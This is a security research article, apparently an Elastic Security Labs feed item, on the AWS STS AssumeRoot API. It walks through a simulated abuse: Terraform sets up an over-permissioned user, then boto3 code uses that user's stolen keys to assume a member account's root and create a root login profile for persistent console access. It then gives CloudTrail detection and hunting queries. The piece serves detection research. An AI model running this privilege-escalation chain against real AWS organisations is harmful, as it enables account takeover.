<li>Insight into STS’ AssumeRoot API operation</li>
<li>Threat scenario using AssumeRoot with Terraform and Python code</li>
<li>Detection and hunting opportunities for potential AssumeRoot abuse</li>
</ul>
<h2>Understanding AWS STS and the AssumeRoot API</h2>
<p>AWS Security Token Service (STS) is a web service that enables users, accounts, and roles to request temporary, limited-privilege credentials. IAM users are typically registered in AWS Identity and Access Management (IAM), where either a login profile is attached for console access, or access keys and secrets are created for programmatic use by services like Lambda, EC2, and others.</p>
<p>While IAM credentials are persistent, <a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html#sts-regionalization"><strong>STS credentials</strong></a> are temporary. These credentials - comprising an access key, secret key, and session token - are granted upon request and are valid for a specific period. Requests are typically sent to the global <code>sts.amazonaws.com</code> endpoint, which responds with temporary credentials for a user or role. These credentials can then be used to access other AWS services on behalf of the specified user or role, as long as the action is explicitly allowed by the associated permission policy.</p>
<p>This process is commonly known as assuming a role, executed via the <a href="https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html"><code>AssumeRole</code></a> API. It is frequently used in AWS environments and organizations for various scenarios. For example:</p>
<ul>
<li>An EC2 instance with an attached role will automatically use <code>AssumeRole</code> to retrieve temporary credentials for API requests.</li>
<li>Similarly, Lambda functions often invoke <code>AssumeRole</code> to authenticate and perform their designated actions.</li>
</ul>
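<p>Programmatically, assuming a role is a single STS call. A minimal boto3-style sketch — the role ARN and session name are hypothetical, and the client is passed in (in practice, <code>boto3.client(&quot;sts&quot;)</code>) so nothing is sent to AWS here:</p>

```python
def assume_role(sts, role_arn: str, session_name: str, duration: int = 900) -> dict:
    """Request temporary credentials for `role_arn` via sts:AssumeRole."""
    resp = sts.assume_role(
        RoleArn=role_arn,
        RoleSessionName=session_name,
        DurationSeconds=duration,
    )
    # Temporary access key, secret key, and session token, valid for `duration` seconds
    return resp["Credentials"]
```

<p>The returned access key, secret key, and session token are then fed into a new client for the target service, where every action is still bounded by the role’s permission policy.</p>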
<p>Although <code>AssumeRole</code> is incredibly useful, it can pose a risk if roles are over-permissioned by the organization. Misconfigured policies with excessive permissions can allow adversaries to abuse these roles, especially in environments where the <a href="https://docs.aws.amazon.com/wellarchitected/latest/framework/sec_permissions_least_privileges.html">Principle of Least Privilege</a> (PoLP) is not strictly enforced. Note that the security risks associated with AssumeRole are typically attributed to misconfigurations or not following best security practices by organizations. These are not the result of AssumeRole or even AssumeRoot development decisions.</p>
<h3>Introduction to AssumeRoot</h3>
<p>AWS recently introduced the <code>AssumeRoot</code> API operation to STS. Similar to <code>AssumeRole</code>, it allows users to retrieve temporary credentials - but specifically for the <a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html">root user</a> of a member account in an AWS organization.</p>
<h3>What Are Member Accounts?</h3>
<p>In AWS, <a href="https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_accounts_access.html">member accounts</a> are separate accounts within an organization that have their own IAM users, services, and roles. These accounts are distinct from the management account, but they still fall under the same organizational hierarchy. Each AWS organization is created with a unique root account tied to the email address used during its setup. Similarly, every member account requires a root user or email address at the time of its creation, effectively establishing its own root identity.</p>
<h3>How Does AssumeRoot Work?</h3>
<p>When a privileged user in the management account needs root-level privileges for a member account, they can use the <code>AssumeRoot</code> API to retrieve temporary credentials for the member account's root user. Unlike <code>AssumeRole</code>, where the target principal is a user ARN, the target principal for <code>AssumeRoot</code> is the member account ID itself. Additionally, a task policy ARN must be specified, which defines the specific permissions allowed with the temporary credentials.</p>
<p>Here are the available task policy ARNs for <code>AssumeRoot</code>:</p>
<ul>
<li><a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/security-iam-awsmanpol.html#security-iam-awsmanpol-IAMAuditRootUserCredentials">IAMAuditRootUserCredentials</a></li>
<li><a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/security-iam-awsmanpol.html#security-iam-awsmanpol-IAMCreateRootUserPassword">IAMCreateRootUserPassword</a></li>
<li><a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/security-iam-awsmanpol.html#security-iam-awsmanpol-IAMDeleteRootUserCredentials">IAMDeleteRootUserCredentials</a></li>
<li><a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/security-iam-awsmanpol.html#security-iam-awsmanpol-S3UnlockBucketPolicy">S3UnlockBucketPolicy</a></li>
<li><a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/security-iam-awsmanpol.html#security-iam-awsmanpol-SQSUnlockQueuePolicy">SQSUnlockQueuePolicy</a></li>
</ul>
<h3>Potential Abuse of Task Policies</h3>
<p>While these predefined task policies limit what can be done with <code>AssumeRoot</code>, their scope can still be theoretically abused in the right circumstances. For example:</p>
<ul>
<li><strong>IAMCreateRootUserPassword</strong>: This policy grants the <a href="https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateLoginProfile.html"><code>iam:CreateLoginProfile</code></a> permission, allowing the creation of a login profile for a user that typically doesn't require console access. If an adversary gains access to programmatic credentials, they could create a login profile and gain console access to the account that is more persistent.</li>
<li><strong>IAMDeleteRootUserCredentials</strong>: This policy allows the deletion of root credentials, but also grants permissions like <a href="https://docs.aws.amazon.com/IAM/latest/APIReference/API_ListAccessKeys.html"><code>iam:ListAccessKeys</code></a> and <a href="https://docs.aws.amazon.com/IAM/latest/APIReference/API_ListMFADevices.html"><code>iam:ListMFADevices</code></a>. These permissions could help an adversary gather critical information about access credentials or MFA configurations for further exploitation.</li>
</ul>
<h2>AssumeRoot in Action</h2>
<p>Now that we understand how AssumeRoot works at a high level, how it differs from AssumeRole, and the potential risks associated with improper security practices, let’s walk through a practical scenario to simulate its usage. Note that this is only one of many potential scenarios in which AssumeRoot could be abused. As of this article's publication, no active abuse has been reported in the wild, as expected with newer AWS functionality.</p>
<p>Below is a simple depiction of what we will accomplish in the following sections:</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/exploring-aws-sts-assumeroot/image3.png" alt="AssumeRoot scenario workflow" /></p>
<p>Before diving in, it’s important to highlight that we’re using an admin-level IAM user configured as the default profile for our local AWS CLI. This setup enables us to properly configure the environment using <a href="https://developer.hashicorp.com/terraform">Terraform</a> and simulate potential threat scenarios in AWS for detection purposes.</p>
<h3>Member Account Creation</h3>
<p>The first step is to enable centralized root access for member accounts, as outlined in the <a href="https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_accounts.html">AWS documentation</a>. Centralized root access allows us to group all AWS accounts into a single organization, with each member account having its own root user.</p>
<p>Next, we manually create a member account within our organization through the Accounts section in the AWS Management Console. For this scenario, the key requirement is to note the member account ID, a unique 12-digit number. For our example, we’ll assume this ID is <code>000000000001</code> and name it <em>AWSAssumeRoot</em>. Centralized management of AWS accounts is a common practice for organizations that may separate different operational services into separate AWS accounts but want to maintain centralized management.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/exploring-aws-sts-assumeroot/image4.png" alt="AWS console showing management account and member account AWSAssumeRoot" /></p>
<p>We also add the member account as the <a href="https://docs.aws.amazon.com/organizations/latest/userguide/orgs_delegate_policies.html">delegated administrator</a> for centralized root access, which allows that member account to manage root access for any other member accounts in the organization.</p>
<p>While we won’t cover it in depth, we have also enabled the new <a href="https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_rcps.html">Resource control policies</a> (RCPs) within Identity and Access Management (IAM). RCPs allow central administration over the permissions granted to resources within accounts in our organization; by default, however, the <em>RCPFullAWSAccess</em> policy allows all permissions to all services for all principals and is attached directly to root.</p>
<h3>Environment Setup</h3>
<p>For our simulation, we use Terraform to create an overly permissive IAM user named compromised_user. This user is granted the predefined <a href="https://docs.aws.amazon.com/aws-managed-policy/latest/reference/AdministratorAccess.html">AdministratorAccess</a> policy, which provides admin-level privileges. Additionally, we generated an access key for this user while intentionally omitting a login profile to reflect a typical setup where credentials are used programmatically. This is not an uncommon practice, especially in developer environments.</p>
<p>Below is the <code>main.tf</code> configuration used to create the resources:</p>
<pre><code>provider &quot;aws&quot; {
  region = var.region
}

data &quot;aws_region&quot; &quot;current&quot; {}

# Create an IAM user with AdministratorAccess (simulated compromised user)
resource &quot;aws_iam_user&quot; &quot;compromised_user&quot; {
  name = &quot;CompromisedUser&quot;
}

# Attach AdministratorAccess Policy to the compromised user
resource &quot;aws_iam_user_policy_attachment&quot; &quot;compromised_user_policy&quot; {
  user       = aws_iam_user.compromised_user.name
  policy_arn = &quot;arn:aws:iam::aws:policy/AdministratorAccess&quot;
}

# Create access keys for the compromised user
resource &quot;aws_iam_access_key&quot; &quot;compromised_user_key&quot; {
  user = aws_iam_user.compromised_user.name
}
</code></pre>
<p>We also define an <code>outputs.tf</code> file to capture key details about the environment, such as the region, access credentials, and the user ARN:</p>
<pre><code>output &quot;aws_region&quot; {
  description = &quot;AWS Region where the resources are deployed&quot;
  value       = var.region
}

output &quot;compromised_user_access_key&quot; {
  value       = aws_iam_access_key.compromised_user_key.id
  sensitive   = true
  description = &quot;Access key for the compromised IAM user&quot;
}

output &quot;compromised_user_secret_key&quot; {
  value       = aws_iam_access_key.compromised_user_key.secret
  sensitive   = true
  description = &quot;Secret key for the compromised IAM user&quot;
}

output &quot;compromised_user_name&quot; {
  value       = aws_iam_user.compromised_user.name
  description = &quot;Name of the compromised IAM user&quot;
}

output &quot;compromised_user_arn&quot; {
  value       = aws_iam_user.compromised_user.arn
  description = &quot;ARN of the compromised IAM user&quot;
}
</code></pre>
<p>Once we run <code>terraform apply</code>, the configuration creates a highly permissive IAM user (<code>compromised_user</code>) with associated credentials. These credentials simulate those that an adversary might obtain for initial access or escalating privileges.</p>
<p>This is one of the first hurdles for an adversary: collecting valid credentials. In today’s threat landscape, information-stealer malware and phishing campaigns aimed at obtaining credentials that can be sold or used for lateral movement are more common than ever. While this is a hurdle, the probability of compromised credentials being available for initial access is high, as seen with <a href="https://www.cisa.gov/sites/default/files/2023-11/aa23-320a_scattered_spider_0.pdf">SCATTERED SPIDER</a> and <a href="https://sysdig.com/blog/scarleteel-2-0/">SCARLETEEL</a>.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/exploring-aws-sts-assumeroot/image1.png" alt="" /></p>
<h3>Establish an STS Client Session with Stolen Credentials</h3>
<p>The next step is to establish an STS client session using the compromised credentials (<code>compromised_user</code> access key and secret key). This session allows the adversary to make requests to AWS STS on behalf of the compromised user.</p>
<p>Here’s the Python code to establish the STS client using the <a href="https://aws.amazon.com/sdk-for-python/">AWS Boto3 SDK</a> (the AWS SDK used to create, configure, and manage AWS services, such as Amazon EC2 and Amazon S3). This Python code is used to create the STS client with stolen IAM user credentials:</p>
<pre><code> sts_client = boto3.client(
     &quot;sts&quot;,
     aws_access_key_id=compromised_access_key,
     aws_secret_access_key=compromised_secret_key,
     region_name=region,
     endpoint_url=f'https://sts.{region}.amazonaws.com'
 )
</code></pre>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/exploring-aws-sts-assumeroot/image7.png" alt="Terminal output when creating STS client with stolen IAM user credentials" /></p>
<p><strong>Note:</strong> During testing, we discovered that the <code>endpoint_url</code> must explicitly point to <code>https://sts.&lt;region&gt;.amazonaws.com</code>. Omitting this may result in an <code>InvalidOperation</code> error when attempting to invoke the <code>AssumeRoot</code> API.</p>
<p>This STS client session forms the foundation for simulating an adversary's actions as we have taken compromised credentials and initiated our malicious actions.</p>
<h3>Assume Root for Member Account on Behalf of Compromised User</h3>
<p>After establishing an STS client session as the compromised user, we can proceed to call the AssumeRoot API. This request allows us to assume the root identity of a member account within an AWS Organization. For the request, the TargetPrincipal is set to the member account ID we obtained earlier, the session duration is set to 900 seconds (15 minutes), and the TaskPolicyArn is defined as <code>IAMCreateRootUserPassword</code>. This policy scopes the permissions to actions related to creating or managing root login credentials.</p>
<p>A notable permission included in this policy is <a href="https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateLoginProfile.html"><code>CreateLoginProfile</code></a>, which enables the creation of a login password for the root user. This allows access to the AWS Management Console as the root user.</p>
<p>Below is the Python code to assume root of member account <code>000000000001</code>, with permissions scoped by <em>IAMCreateRootUserPassword</em>.</p>
<pre><code>response = sts_client.assume_root(
    TargetPrincipal=member_account_id,
    DurationSeconds=900,
    TaskPolicyArn={&quot;arn&quot;: &quot;arn:aws:iam::aws:policy/root-task/IAMCreateRootUserPassword&quot;},
)
root_temp_creds = response[&quot;Credentials&quot;]
</code></pre>
<p>If the AssumeRoot request is successful, the response provides temporary credentials (<code>root_temp_creds</code>) for the root account of the target member. These credentials include an access key, secret key, and session token, enabling temporary root-level access for the duration of the session.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/exploring-aws-sts-assumeroot/image6.png" alt="Terminal output showing AssumeRoot with IAMCreateRootUserPassword for AWSAssumeRoot member account
" /></p>
<h3>Creating a Login Profile for the Member Root Account</h3>
<p>With temporary root credentials in hand, the next step is to establish an authenticated IAM client session as the root user of the member account. Using this session, we can call the <code>create_login_profile()</code> method. This method allows us to assign a login password to the root user, enabling console access.</p>
<p>The following Python code establishes an authenticated IAM client and creates a login profile:</p>
<pre><code>iam_client = boto3.client(
    &quot;iam&quot;,
    aws_access_key_id=root_temp_creds[&quot;AccessKeyId&quot;],
    aws_secret_access_key=root_temp_creds[&quot;SecretAccessKey&quot;],
    aws_session_token=root_temp_creds[&quot;SessionToken&quot;],
)

response = iam_client.create_login_profile()
</code></pre>
<p>It’s worth noting that the <code>create_login_profile()</code> method requires no explicit parameters for the root user, as it acts on the credentials of the currently authenticated session. In this case, it will apply to the root user of the member account.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/exploring-aws-sts-assumeroot/image5.png" alt="Terminal output showing IAM client established as Root member account and CreateLoginProfile request" /></p>
<h3>Reset the Administrator Password and Login to the AWS Console</h3>
<p>At this stage, we’re nearly complete! Let’s recap the progress so far:</p>
<ol>
<li>Using compromised IAM user credentials, we established an STS session to assume the identity of an overly permissive user.</li>
<li>Leveraging this session, we assumed the identity of the root user of a target member account, acquiring temporary credentials scoped to the <code>IAMCreateRootUserPassword</code> task policy.</li>
<li>With these temporary root credentials, we established an IAM client session and successfully created a login profile for the root user.</li>
</ol>
<p>The final step involves resetting the root user password to gain permanent access to the AWS Management Console. To do this, visit the AWS console login page and attempt to log in as the root user. Select the “Forgot Password” option to initiate the password recovery process. This will prompt a CAPTCHA challenge, after which a password reset link is sent to the root user’s email address. This would be the third roadblock for an adversary as they would need access to the root user’s email inbox to continue with the password reset workflow. It should be acknowledged that if <em>CreateLoginProfile</em> is called, you can specify the password for the user and enforce a “password reset required”. However, this is not allowed for root accounts by default, and for good reason by AWS. Unlike the first hurdle of having valid credentials, access to a user’s inbox may prove more difficult and less likely, but again, with enough motivation and resources, it is still possible.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/exploring-aws-sts-assumeroot/image2.png" alt="Password recovery request from AWS sign-in for root" /></p>
<p>After selecting the password reset link, you can set a new password for the root user. This step provides lasting access to the console as the root user. Unlike the temporary credentials obtained earlier, this access is no longer limited by the session duration or scoped permissions of the <code>IAMCreateRootUserPassword</code> policy, granting unrestricted administrative control over the member account.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/exploring-aws-sts-assumeroot/image8.png" alt="Successful login as root for AWSAssumeRoot member account" /></p>
<p><strong>Before moving on, if you followed along and tried this in your environment, we want to gently remind you to remove the testing resources</strong> by running <code>terraform destroy</code> in the same folder where you initialized and deployed them.</p>
<h2>Detection and Hunting Opportunities</h2>
<p>While exploring cloud features and APIs from an adversary's perspective is insightful, our ultimate responsibility lies in detecting and mitigating malicious or anomalous behavior, alerting stakeholders, and responding effectively. And while this scenario has not been publicly documented in the wild, we should not wait to become a victim and react after the fact, hence our whitebox scenario.</p>
<p>The following detection and hunting queries rely on AWS CloudTrail data ingested into the Elastic Stack using the <a href="https://www.elastic.co/es/docs/current/integrations/aws">AWS integration</a>. If your environment differs, you may need to adjust these queries for custom ingestion processes or adapt them for a different SIEM or query tool.</p>
<p><strong>Note:</strong> Ensure that AWS CloudTrail is enabled for all accounts in your organization to provide comprehensive visibility into activity across your AWS environment. You may also need to configure the monitoring trail as an organization-wide trail so that all member accounts are properly observed.</p>
<h3>Hunting - Unusual Action for IAM User Access Key</h3>
<p>This query identifies potentially compromised IAM access keys that are used to make unusual API calls. It sorts the results in ascending order to surface less frequent API calls within the last two weeks. This query can be adjusted to account for different API calls or include other CloudTrail-specific fields.</p>
<p>Hunting Query: <a href="https://github.com/elastic/detection-rules/blob/7b88b36d294407cc1ea2ab1b0acbbbf3104162a9/hunting/aws/docs/iam_unusual_access_key_usage_for_user.md">AWS IAM Unusual AWS Access Key Usage for User</a></p>
<p>MITRE ATT&amp;CK:</p>
<ul>
<li>T1078.004 - <a href="https://attack.mitre.org/techniques/T1078/004/">Valid Accounts: Cloud Accounts</a></li>
</ul>
<p>Language: ES|QL</p>
<pre><code>FROM logs-aws.cloudtrail*
| WHERE @timestamp &gt; now() - 14 day
| WHERE
    event.dataset == &quot;aws.cloudtrail&quot;
    and event.outcome == &quot;success&quot;
    and aws.cloudtrail.user_identity.access_key_id IS NOT NULL
    and aws.cloudtrail.resources.arn IS NOT NULL
    and event.action NOT IN (&quot;GetObject&quot;)
| EVAL daily_buckets = DATE_TRUNC(1 days, @timestamp)
| STATS
    api_counts = count(*) by daily_buckets, aws.cloudtrail.user_identity.arn, aws.cloudtrail.user_identity.access_key_id, aws.cloudtrail.resources.arn, event.action
| WHERE api_counts &lt; 2
| SORT api_counts ASC
</code></pre>
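<p>For readers without an Elastic Stack handy, the same aggregation can be approximated outside ES|QL. The sketch below mirrors the hunt's daily grouping and rarity threshold, using simplified field names in place of the dotted CloudTrail fields and fabricated sample events.</p>

```python
# Standalone approximation of the ES|QL hunt above, for illustration.
# Field names are simplified; the sample events are fabricated.
from collections import Counter
from datetime import datetime

def rare_api_calls(events, threshold=2):
    """Bucket successful access-key API calls by day and flag rare combinations."""
    counts = Counter()
    for e in events:
        if e["outcome"] != "success" or not e.get("access_key_id"):
            continue
        if e["action"] == "GetObject":  # excluded by the hunt above
            continue
        day = datetime.fromisoformat(e["timestamp"]).date()
        counts[(day, e["user_arn"], e["access_key_id"], e["action"])] += 1
    # rarest first, mirroring SORT api_counts ASC
    return sorted((k for k, v in counts.items() if v < threshold),
                  key=lambda k: counts[k])

events = [
    {"timestamp": "2024-12-01T10:00:00", "outcome": "success",
     "access_key_id": "AKIAEXAMPLE", "action": "AssumeRoot",
     "user_arn": "arn:aws:iam::111111111111:user/dev"},
    {"timestamp": "2024-12-01T10:05:00", "outcome": "success",
     "access_key_id": "AKIAEXAMPLE", "action": "GetObject",
     "user_arn": "arn:aws:iam::111111111111:user/dev"},
]
rare = rare_api_calls(events)  # the lone AssumeRoot call surfaces as rare
```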
<h3>Detection - Unusual Assume Root Action by Rare IAM User</h3>
<p>Detection Rule: <a href="https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/privilege_escalation_sts_assume_root_from_rare_user_and_member_account.toml">AWS STS AssumeRoot by Rare User and Member Account</a></p>
<p>This query identifies instances where the <code>AssumeRoot</code> API call is made by an IAM user ARN and member account that have not performed this action in the last 14 days. This anomaly-based detection uses Elastic’s <a href="https://www.elastic.co/es/guide/en/security/current/rules-ui-create.html#create-new-terms-rule">New Terms</a> detection rule.</p>
<ul>
<li>The <code>aws.cloudtrail.user_identity.arn</code> field identifies the source IAM user from the management AWS account.</li>
<li>The <code>aws.cloudtrail.resources.account_id</code> field reflects the target member account.</li>
</ul>
<p>MITRE ATT&amp;CK:</p>
<ul>
<li>T1548.005 - <a href="https://attack.mitre.org/techniques/T1548/005/">Temporary Elevated Cloud Access</a></li>
<li>T1098.003 - <a href="https://attack.mitre.org/techniques/T1098/003/">Additional Cloud Roles</a></li>
</ul>
<p>Language: KQL</p>
<pre><code>event.dataset: &quot;aws.cloudtrail&quot;
    and event.provider: &quot;sts.amazonaws.com&quot;
    and event.action: &quot;AssumeRoot&quot;
    and event.outcome: &quot;success&quot;
</code></pre>
<p>New Term Fields:<br />
If any combination of these fields has not been seen executing AssumeRoot within the last 14 days, an alert is generated.</p>
<ul>
<li><code>aws.cloudtrail.user_identity.arn</code></li>
<li><code>aws.cloudtrail.resources.account_id</code></li>
</ul>
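<p>The New Terms logic can be approximated in a few lines: track the last time each (caller ARN, member account) pair performed AssumeRoot, and alert when a pair appears with no sighting in the trailing 14 days. Field names below are simplified stand-ins for the dotted CloudTrail fields.</p>

```python
# Minimal sketch of the New Terms logic: alert when a (caller ARN, member
# account) pair performs AssumeRoot without a sighting in the prior 14 days.
from datetime import datetime, timedelta

BASELINE = timedelta(days=14)

def new_term_alerts(events):
    last_seen = {}  # (user_arn, member_account_id) -> last AssumeRoot time
    alerts = []
    for e in sorted(events, key=lambda e: e["timestamp"]):
        ts = datetime.fromisoformat(e["timestamp"])
        key = (e["user_arn"], e["member_account_id"])
        prev = last_seen.get(key)
        if prev is None or ts - prev > BASELINE:
            alerts.append((ts, *key))
        last_seen[key] = ts
    return alerts

events = [
    {"timestamp": "2024-12-01T09:00:00", "member_account_id": "222222222222",
     "user_arn": "arn:aws:iam::111111111111:user/admin"},
    {"timestamp": "2024-12-05T09:00:00", "member_account_id": "222222222222",
     "user_arn": "arn:aws:iam::111111111111:user/admin"},
]
alerts = new_term_alerts(events)  # only the first sighting is a new term
```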
<h3>Detection - Self-Created Login Profile for Root Member Account</h3>
<p>This query detects instances where a login profile is created for a root member account by the root account itself, potentially indicating unauthorized or anomalous behavior.</p>
<p>Detection Rule: <a href="https://github.com/elastic/detection-rules/blob/4374128458d116211d5d22993b6d87f6c82a30a0/rules/integrations/aws/persistence_iam_create_login_profile_for_root.toml">AWS IAM Login Profile Added for Root</a></p>
<p>MITRE ATT&amp;CK:</p>
<ul>
<li>T1098.003 - <a href="https://attack.mitre.org/techniques/T1098/003/">Account Manipulation: Additional Cloud Roles</a></li>
<li>T1548.005 - <a href="https://attack.mitre.org/techniques/T1548/005/">Abuse Elevation Control Mechanism: Temporary Elevated Cloud Access</a></li>
<li>T1078.004 - <a href="https://attack.mitre.org/techniques/T1078/004/">Valid Accounts: Cloud Accounts</a></li>
</ul>
<p>Language: ES|QL</p>
<pre><code>FROM logs-aws.cloudtrail* 
| WHERE
    // filter for CloudTrail logs from IAM
    event.dataset == &quot;aws.cloudtrail&quot;
    and event.provider == &quot;iam.amazonaws.com&quot;
    // filter for successful CreateLoginProfile API call
    and event.action == &quot;CreateLoginProfile&quot;
    and event.outcome == &quot;success&quot;
    // filter for Root member account
    and aws.cloudtrail.user_identity.type == &quot;Root&quot;
    // filter for an access key existing which sources from AssumeRoot
    and aws.cloudtrail.user_identity.access_key_id IS NOT NULL
    // filter on the request parameters not including UserName which assumes self-assignment
    and NOT TO_LOWER(aws.cloudtrail.request_parameters) LIKE &quot;*username*&quot;
| keep
    @timestamp,
    aws.cloudtrail.request_parameters,
    aws.cloudtrail.response_elements,
    aws.cloudtrail.user_identity.type,
    aws.cloudtrail.user_identity.arn,
    aws.cloudtrail.user_identity.access_key_id,
    cloud.account.id,
    event.action,
    source.address,
    source.geo.continent_name,
    source.geo.region_name,
    source.geo.city_name,
    user_agent.original,
    user.id
</code></pre>
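<p>Expressed as a plain predicate (with simplified field names standing in for the dotted CloudTrail fields above), the rule's filters look like this:</p>

```python
# Sketch of the rule's filter logic as a plain predicate. Field names are
# simplified stand-ins for the CloudTrail fields used in the ES|QL above.
def is_self_created_root_login_profile(event: dict) -> bool:
    return (
        event.get("event_provider") == "iam.amazonaws.com"
        and event.get("event_action") == "CreateLoginProfile"
        and event.get("event_outcome") == "success"
        and event.get("user_identity_type") == "Root"
        # an access key on a Root identity implies AssumeRoot-derived credentials
        and bool(event.get("access_key_id"))
        # no UserName in the request parameters implies self-assignment
        and "username" not in (event.get("request_parameters") or "").lower()
    )
```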
<p>These detections are specific to our scenario and are not fully inclusive of all potential AssumeRoot abuse. If you explore and discover additional hunting or threat detection opportunities, feel free to share them in our <a href="https://github.com/elastic/detection-rules">Detection Rules</a> repository or our <a href="https://github.com/elastic/detection-rules/tree/main/hunting">Threat Hunting</a> library.</p>
<h2>Hardening Practices for AssumeRoot Use</h2>
<p>AWS <a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html">documentation</a> contains several important considerations and best security practices for IAM, STS, and many other services. However, cloud security is not a “one size fits all” workflow, and security practices should be tailored to your environment, risk tolerance, and more.</p>
<p><strong>Visibility is Key:</strong> If you can’t see it, you can’t protect it. Start by enabling CloudTrail with organization-wide trails to log activity across all accounts. Focus on capturing IAM and STS operations for insights into access and permission usage. Pair this with Security Hub for continuous monitoring and tools like Elastic or GuardDuty to hunt for unusual AssumeRoot actions.</p>
<p><strong>Lock Down AssumeRoot Permissions:</strong> Scope AssumeRoot usage to critical tasks only, such as audits or recovery, by restricting task policies to essentials like <code>IAMAuditRootUserCredentials</code>. Assign these permissions to specific roles in the management account and keep those roles tightly controlled. Regularly review and remove unnecessary permissions to maintain the principle of least privilege (PoLP).</p>
<p><strong>MFA and Guardrails for Root Access:</strong> Enforce MFA for all users, especially those with access to AssumeRoot. Use AWS Organizations to disable root credential recovery unless absolutely needed, and remove unused root credentials entirely. Resource control policies (RCPs) can help centralize and tighten permissions for tasks involving AssumeRoot or other sensitive operations.</p>
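<p>As a concrete illustration of the lockdown guidance above, the snippet below builds a hypothetical deny statement suitable for a service control or resource control policy, blocking <code>sts:AssumeRoot</code> for everything except a designated break-glass role. The role ARN is a placeholder; validate condition keys against your own policy tooling before use.</p>

```python
# Hypothetical guardrail: a deny statement (e.g., for an SCP or resource
# control policy) blocking sts:AssumeRoot for everything except one
# break-glass role. The role ARN is a placeholder.
import json

def deny_assume_root_policy(allowed_role_arn: str) -> str:
    policy = {
        "Version": "2012-10-17",
        "Statement": [{
            "Sid": "DenyAssumeRootExceptBreakGlass",
            "Effect": "Deny",
            "Action": "sts:AssumeRoot",
            "Resource": "*",
            "Condition": {
                "StringNotEquals": {"aws:PrincipalArn": allowed_role_arn}
            },
        }],
    }
    return json.dumps(policy, indent=2)

print(deny_assume_root_policy("arn:aws:iam::111111111111:role/BreakGlassAdmin"))
```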
<h1>Conclusion</h1>
<p>We hope this article provides valuable insight into AWS’ AssumeRoot API operation, how it can be abused by adversaries, and some threat detection and hunting guidance. Abusing AssumeRoot is one of many living-off-the-cloud (LotC) techniques available to adversaries, and we encourage others to explore, research, and share their findings with the community and AWS.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/es/security-labs/assets/images/exploring-aws-sts-assumeroot/Security Labs Images 20.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Elevate Your Threat Hunting with Elastic]]></title>
            <link>https://www.elastic.co/es/security-labs/elevate-your-threat-hunting</link>
            <guid>elevate-your-threat-hunting</guid>
            <pubDate>Fri, 18 Oct 2024 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic is releasing a threat hunting package designed to aid defenders with proactive detection queries to identify actor-agnostic intrusions.]]></description>
            <content:encoded><![CDATA[<p>We are excited to announce a new resource in the Elastic <a href="https://github.com/elastic/detection-rules">Detection Rules</a> repository: a collection of hunting queries powered by various Elastic query languages!</p>
<p>These hunting queries can be found under the <a href="https://github.com/elastic/detection-rules/tree/main/hunting">Hunting</a> package. This initiative is designed to empower our community with specialized threat hunting queries and resources across multiple platforms, complementing our robust SIEM and EDR ruleset. These are developed to be consistent with the paradigms and methodologies we discuss in the Elastic <a href="https://www.elastic.co/es/security/threat-hunting">Threat Hunting guide</a>.</p>
<h2>Why Threat Hunting?</h2>
<p>Threat hunting is a proactive approach to security that involves searching for hidden threats that evade conventional detection solutions while assuming breach. At Elastic, we recognize the importance of threat hunting in strengthening security defenses and are committed to facilitating this critical activity.</p>
<p>While we commit a substantial amount of time and effort towards building out resilient detections, we understand that alerting on malicious behavior is only one part of an effective overall strategy. Threat hunting moves the needle to the left, allowing for a more proactive approach to understanding and securing the environment.</p>
<p>The idea is that the rules and hunt queries will supplement each other in many ways. Most hunts also serve as great pivot points once an alert has triggered, providing a powerful means to ascertain related details and paint a full picture. They are just as useful for triage as for proactive hunting.</p>
<p>Additionally, we often find ourselves writing resilient and robust logic that just doesn’t meet the criteria for a rule, whether it is too noisy or not specific enough. This will serve as an additional means to preserve the value of these research outcomes in the form of these queries.</p>
<h2>What We Are Providing</h2>
<p>The new Hunting package provides a diverse range of hunting queries targeting all the same environments as our rules, and potentially even more, including:</p>
<ul>
<li>Endpoints (Windows, Linux, macOS)</li>
<li>Cloud (CSPs, SaaS providers, etc.)</li>
<li>Network</li>
<li>Large Language Models (LLM)</li>
<li>Any other Elastic <a href="https://www.elastic.co/es/integrations">integration</a> or datasource that adds value</li>
</ul>
<p>These queries are crafted by our security experts to help you gather the initial data required to test your hypotheses during hunts. Each query includes a name and description that can serve as a starting point for your hunting efforts. All of this valuable information is stored in an index file (both YAML and Markdown) for management, ease of use, and centralized access to the collection of hunting queries.</p>
<h3>Hunting Package</h3>
<p>The Hunting package has also been made to be its own module within Detection Rules with a few simple commands for easy management and searching throughout the catalogue of hunting queries. Our goal is not to provide an out-of-the-box hunting tool, but rather a foundation for programmatically managing and eventually leveraging these hunting queries.</p>
<p>Existing Commands:</p>
<p><strong>Generate Markdown</strong> - Load TOML files or path of choice and convert to Markdown representation in respective locations.
<img src="https://www.elastic.co/es/security-labs/assets/images/elevate-your-threat-hunting/image6.png" alt="" /></p>
<p><strong>Refresh Index</strong> - Refresh indexes from the collection of queries, both YAML and Markdown.
<img src="https://www.elastic.co/es/security-labs/assets/images/elevate-your-threat-hunting/image4.png" alt="" /></p>
<p><strong>Search</strong> - Search for hunting queries based on MITRE tactic, technique or subtechnique IDs. Also includes the ability to search per data source.
